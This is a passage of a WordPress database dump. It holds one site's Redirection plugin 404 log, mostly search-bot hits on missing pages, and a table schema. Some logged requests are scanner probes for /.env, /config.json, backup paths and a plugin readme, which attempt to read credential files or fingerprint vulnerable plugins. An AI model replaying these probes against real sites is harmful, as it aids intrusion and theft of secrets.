17:47:20','/iwu6g50e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38026,'2023-01-30 17:53:46','/amrtxf3f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(38027,'2023-01-30 17:56:49','/kgel1maf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38028,'2023-01-30 18:15:37','/dot897rf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(38029,'2023-01-30 18:22:44','/marketer/wz0de6ae2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.23'),(38030,'2023-01-30 18:31:31','/14ioxk6f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(38031,'2023-01-30 18:55:47','/daily-cmvjdXJ2aXJvc3RyYQ6.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38032,'2023-01-30 18:56:05','/kwzqldwe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38033,'2023-01-30 19:02:22','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.201.128.143'),(38034,'2023-01-30 19:02:23','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.201.128.143'),(38035,'2023-01-30 19:02:24','/app-ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.201.128.143'),(38036,'2023-01-30 19:02:26','/app-ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.201.128.143'),(38037,'2023-01-30 19:02:32','/fancier/92vsedkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(38038,'2023-01-30 19:13:46','/kit0upjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(38039,'2023-01-30 19:20:26','/infeoffment/isfdniie2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(38040,'2023-01-30 19:23:21','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38041,'2023-01-30 19:25:18','/aqfevqxg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38042,'2023-01-30 19:29:54','/kkm4mfye2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(38043,'2023-01-30 19:44:22','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38044,'2023-01-30 19:48:36','/chiniz5/dorah06h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(38045,'2023-01-30 19:53:57','/ditto13/tbj2i96e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(38046,'2023-01-30 20:04:31','/9bk0gr7e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(38047,'2023-01-30 20:12:59','/962fzeug2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(38048,'2023-01-30 20:18:46','/93kh15xe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38049,'2023-01-30 20:22:15','/tetramera/toouj8vf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38050,'2023-01-30 20:44:17','/data/admin/allowurl.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',NULL,404,'GET',NULL,'222.186.43.66'),(38051,'2023-01-30 21:46:29','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38052,'2023-01-30 23:14:07','/body/accrlqme2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.33'),(38053,'2023-01-30 23:14:15','/1dym5vte2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.190'),(38054,'2023-01-30 23:55:59','/advice/chip20','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38055,'2023-01-31 00:08:31','/aqa8octg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.190'),(38056,'2023-01-31 00:09:42','/1uhuhmxe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.190'),(38057,'2023-01-31 00:13:45','/labial/i42xl0ag2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.91'),(38058,'2023-01-31 00:24:55','/ramulous/ieep5xie2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.15'),(38059,'2023-01-31 00:39:43','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPad; U; CPU OS 4_1_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38060,'2023-01-31 01:20:24','/wordpress','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/wordpress',404,'HEAD',NULL,'209.126.86.35'),(38061,'2023-01-31 01:20:26','/wp','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/wp',404,'HEAD',NULL,'209.126.86.35'),(38062,'2023-01-31 01:20:26','/bc','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/bc',404,'HEAD',NULL,'209.126.86.35'),(38063,'2023-01-31 01:20:27','/bk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/bk',404,'HEAD',NULL,'209.126.86.35'),(38064,'2023-01-31 01:20:28','/backup','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/backup',404,'HEAD',NULL,'209.126.86.35'),(38065,'2023-01-31 01:20:29','/old','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/old',404,'HEAD',NULL,'209.126.86.35'),(38066,'2023-01-31 01:20:30','/new','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/new',404,'HEAD',NULL,'209.126.86.35'),(38067,'2023-01-31 01:20:30','/main','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/main',404,'HEAD',NULL,'209.126.86.35'),(38068,'2023-01-31 01:20:31','/home','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','https://dailyjolly.co.uk/home',404,'HEAD',NULL,'209.126.86.35'),(38069,'2023-01-31 01:28:15','/.env','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0',NULL,404,'GET',NULL,'66.23.202.121'),(38070,'2023-01-31 02:38:25','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38071,'2023-01-31 03:17:44','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38072,'2023-01-31 04:44:02','/.env','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0',NULL,404,'GET',NULL,'66.23.202.121'),(38073,'2023-01-31 05:01:33','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38074,'2023-01-31 05:09:28','/adult-web-cams/mature-web-cams.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'135.181.128.56'),(38075,'2023-01-31 06:46:07','/atogallery/?ubsaharaknite','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.109.26.43'),(38076,'2023-01-31 06:46:10','/atogallery/?ubsaharaknite','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.109.26.43'),(38077,'2023-01-31 06:46:15','/atogallery/?ukstarlets','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.109.26.43'),(38078,'2023-01-31 06:46:19','/atogallery/?ukstarlets','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.109.26.43'),(38079,'2023-01-31 06:46:23','/adult-jokes/index.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.109.26.43'),(38080,'2023-01-31 07:04:29','/optical-brighteners','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(38081,'2023-01-31 09:10:04','/config.json','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','https://dailyjolly.co.uk/config.json',404,'GET',NULL,'79.124.49.14'),(38082,'2023-01-31 09:19:09','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38083,'2023-01-31 10:41:55','/.env','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','https://dailyjolly.co.uk/.env',404,'GET',NULL,'79.124.59.150'),(38084,'2023-01-31 10:56:08','/articles/no-nasties/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(38085,'2023-01-31 11:13:22','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38086,'2023-01-31 12:46:38','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38087,'2023-01-31 12:57:59','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38088,'2023-01-31 14:37:11','/ads.txt','https://www.dailyjolly.co.uk','AdsTxtCrawler/1.0.2',NULL,404,'GET',NULL,'3.236.44.96'),(38089,'2023-01-31 14:37:53','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.75.250'),(38090,'2023-01-31 15:46:40','/adult-web-cams/mature-web-cams.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/adult-web-cams/mature-web-cams.htm',404,'GET',NULL,'93.124.126.153'),(38091,'2023-01-31 16:07:48','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.75.252'),(38092,'2023-01-31 16:16:36','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3282.140 Safari/537.36 Edge/18.17763','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38093,'2023-01-31 18:57:09','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38094,'2023-01-31 19:51:24','/the-fundamentals-in-party-planning','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','https://www.dailyjolly.co.uk/the-fundamentals-in-party-planning',404,'GET',NULL,'193.37.33.204'),(38095,'2023-01-31 20:59:15','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3790 Safari/537.36 Edg/78.0.142.6','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38096,'2023-01-31 21:25:08','/wp-content/plugins/js-support-ticket/readme.txt','https://www.dailyjolly.co.uk','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',NULL,404,'GET',NULL,'109.248.175.137'),(38097,'2023-01-31 21:38:16','/basquish/i4ec4zkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.95'),(38098,'2023-01-31 21:45:54','/vitrage/92fifkaf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38099,'2023-01-31 21:59:13','/iybanr1f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.251'),(38100,'2023-01-31 22:02:16','/tambur/wx6urekg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38101,'2023-01-31 22:14:44','/dastardly/dpo98b1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22'),(38102,'2023-01-31 22:20:42','/dtvtn90e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22'),(38103,'2023-01-31 22:22:45','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38104,'2023-01-31 22:23:47','/tvwp4m0f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.91'),(38105,'2023-01-31 22:26:06','/tricrotism/k40t3bhe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.251'),(38106,'2023-01-31 22:26:08','/anticipate/ks4ih1te2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.251'),(38107,'2023-01-31 22:26:20','/limniad/tesr4m4g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22'),(38108,'2023-01-31 22:29:51','/negatived29/92ey0g2f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.73'),(38109,'2023-01-31 22:41:07','/i8h8yx5g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38110,'2023-01-31 22:48:29','/tails8/diodnd1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38111,'2023-01-31 22:50:09','/publish-bhv4dXJpYXRlZA0.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38112,'2023-01-31 22:52:31','/unsinew/ko8nt9he2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.67'),(38113,'2023-01-31 22:53:22','/supawn/1uavqbyg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.73'),(38114,'2023-01-31 22:54:50','/1cls6ane2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22'),(38115,'2023-01-31 22:59:07','/t6504f8f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22'),(38116,'2023-01-31 23:26:55','/k6hng4qe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.73'),(38117,'2023-01-31 23:31:32','/planetule/tordg17e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.95'),(38118,'2023-01-31 23:42:25','/t72obo6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.91'),(38119,'2023-01-31 23:43:51','/subterranean/10c4gvfe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.91'),(38120,'2023-01-31 23:53:12','/internship/isby62ge2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22'),(38121,'2023-01-31 23:56:12','/tnm6bv5f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.22');
/*!40000 ALTER TABLE `wp_redirection_404` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_groups`
--

DROP TABLE IF EXISTS `wp_redirection_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_groups` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `tracking` int(11) NOT NULL DEFAULT 1,
  `module_id` int(11) unsigned NOT NULL DEFAULT 0,
  `status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
  `position` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `module_id` (`module_id`),
  KEY `status` (`status`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_groups`
--

LOCK TABLES `wp_redirection_groups` WRITE;
/*!40000 ALTER TABLE `wp_redirection_groups` DISABLE KEYS */;
